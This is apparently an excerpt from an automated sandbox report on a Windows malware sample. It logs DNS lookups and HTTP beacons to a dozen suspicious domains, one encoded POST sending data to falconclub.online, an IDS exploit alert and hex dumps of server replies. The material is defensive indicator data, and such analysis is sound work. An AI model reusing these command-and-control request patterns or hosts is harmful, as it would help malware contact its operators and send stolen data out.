            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.8:49711
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
            Source: global trafficHTTP traffic detected: GET /hfue/?sHS=543hApwHD&F2=GzF3o7eza1dU4F476cHHeral/cYJG+FCwgJMIz0HPlfrSCMBDVuQfjGNmxBd7moVrhCGY2hY7MCgK+Mnekgs9Dtqmg1if+oIl65BopybHLADU68if1oWKFmqENabDE70MA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.multileveltravel.worldConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /sld7/?F2=/serfU6kaxhlkkJx8dOr0qlSRXA+6La0KEB68G6jbYfyT6z2zvVJBFhkOYA104kn6FRHm7lAc7gn2TRu9DlzyIrvo6u+6+g1Ilwo5dhHoQBd/NfHtrD7TOfEhTSvK6UN8A==&sHS=543hApwHD HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.falconclub.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /abrg/?F2=GnAJmiRPPiyH2TmfuBVnsZoXdGf0FUPFySgQhtVOM4GwnDq9Dnvh9ePCWYtJxLLAU+yG0d2c2V85YMiF3u+CXoS/lp19JNeFf5Feq2s9J88WlfAexgO/UytfAJO4SOXJGQ==&sHS=543hApwHD HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.promasterev.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /itly/?F2=tsSBdLA6gv84Y8GcYug/jDCyCw8YLYxClZSiOA0GXKnW8CsuEbQ9YFwfaGPSJlWcPZlV2TdpOPQww8tdSTouFUFoXNGv3nAP+8PLYYLXnvdwJlki1+XL6LziD5lvjPEK7Q==&sHS=543hApwHD HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.childlesscatlady.todayConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /szy7/?F2=K8R7SnSfb7dli3eXRAD3SnntsVSSj1ZCjsRlCzIsDWJUxclcgzVYTq7f6N7/UKjTBpPX3WVoPH/v0tj5Dmk2zyO1xKTiz6oBrNu4Rs3SGBcTrpTqDeJ9pPLW36ghW+11Rw==&sHS=543hApwHD HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.doggieradio.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /azuc/?F2=IEG0cbQocDdgsf0hXa+uAMZkMIV+L9dmDWmvXBjU8TDCB1WiaKjeRQjMK7ZBG/72TlyV3qB8EHQj0nSZZfMRjS9f0ml2OHl666AhHB2VhosEmVxlyD8Sfr3+gvtJ58MzMw==&sHS=543hApwHD HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.demovix.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /bnrz/?F2=OQxwzbuOtqgqEYELNcMucZtHnRjB34c8S/VejUlVZtuveUVj7y4E7KtMGd+fy1MLwhM03wpJ8ksC3Umpmq485u0/vrhbrCPm9Wbu3FX/PMpZ3p2821/Za72d+YrU3sps/g==&sHS=543hApwHD HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.palcoconnector.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /b6g5/?F2=a8QqMioE13Jt2iPiOClkfJLiI6soJM7xy7KAtya8ruOCNgqe2jC0xyltzPPw7ePD7gDMaG5P8Bx9i7otBFrS2CJxsBKcruwu6mzHCImmdlnckGZwJuxb62mJXIzJiBU08Q==&sHS=543hApwHD HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.shanhaiguan.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.multileveltravel.world
            Source: global trafficDNS traffic detected: DNS query: www.falconclub.online
            Source: global trafficDNS traffic detected: DNS query: www.promasterev.shop
            Source: global trafficDNS traffic detected: DNS query: www.childlesscatlady.today
            Source: global trafficDNS traffic detected: DNS query: www.animekuid.xyz
            Source: global trafficDNS traffic detected: DNS query: www.doggieradio.net
            Source: global trafficDNS traffic detected: DNS query: www.demovix.xyz
            Source: global trafficDNS traffic detected: DNS query: www.palcoconnector.net
            Source: global trafficDNS traffic detected: DNS query: www.shanhaiguan.net
            Source: global trafficDNS traffic detected: DNS query: www.mtcep.org
            Source: global trafficDNS traffic detected: DNS query: www.es-lidl.online
            Source: unknownHTTP traffic detected: POST /sld7/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.falconclub.onlineOrigin: http://www.falconclub.onlineCache-Control: max-age=0Content-Length: 203Connection: closeContent-Type: application/x-www-form-urlencodedReferer: http://www.falconclub.online/sld7/User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36Data Raw: 46 32 3d 79 75 32 4c 63 68 76 55 63 45 70 51 68 56 4e 52 35 64 61 53 69 73 5a 4d 65 41 78 47 73 71 2b 75 4f 57 63 37 70 48 4f 67 48 2b 4b 49 62 72 65 38 37 73 70 4b 44 33 70 74 45 6f 45 48 33 49 42 36 7a 53 64 70 68 4f 56 76 4b 65 78 34 79 6b 4d 71 30 48 56 4b 71 35 58 4a 73 76 33 73 72 70 70 6a 64 6c 31 77 30 2f 59 2b 79 30 4e 74 31 36 7a 4b 76 62 66 6a 64 4c 76 41 70 41 43 6e 49 71 73 45 6f 38 53 36 4b 42 62 36 65 62 69 46 4a 35 63 6e 68 31 58 71 37 48 43 38 78 64 56 57 52 49 2f 62 4d 4c 6b 63 4b 68 4d 35 55 4d 6b 47 6c 34 47 46 4d 42 41 59 53 66 6c 65 70 4e 31 36 66 36 35 5a 55 34 52 6d 44 71 6f 3d Data Ascii: F2=yu2LchvUcEpQhVNR5daSisZMeAxGsq+uOWc7pHOgH+KIbre87spKD3ptEoEH3IB6zSdphOVvKex4ykMq0HVKq5XJsv3srppjdl1w0/Y+y0Nt16zKvbfjdLvApACnIqsEo8S6KBb6ebiFJ5cnh1Xq7HC8xdVWRI/bMLkcKhM5UMkGl4GFMBAYSflepN16f65ZU4RmDqo=
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Thu, 07 Nov 2024 14:27:53 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Thu, 07 Nov 2024 14:27:55 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Thu, 07 Nov 2024 14:27:58 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Thu, 07 Nov 2024 14:28:00 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 14:29:01 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 16026X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 14:29:03 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 16026X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 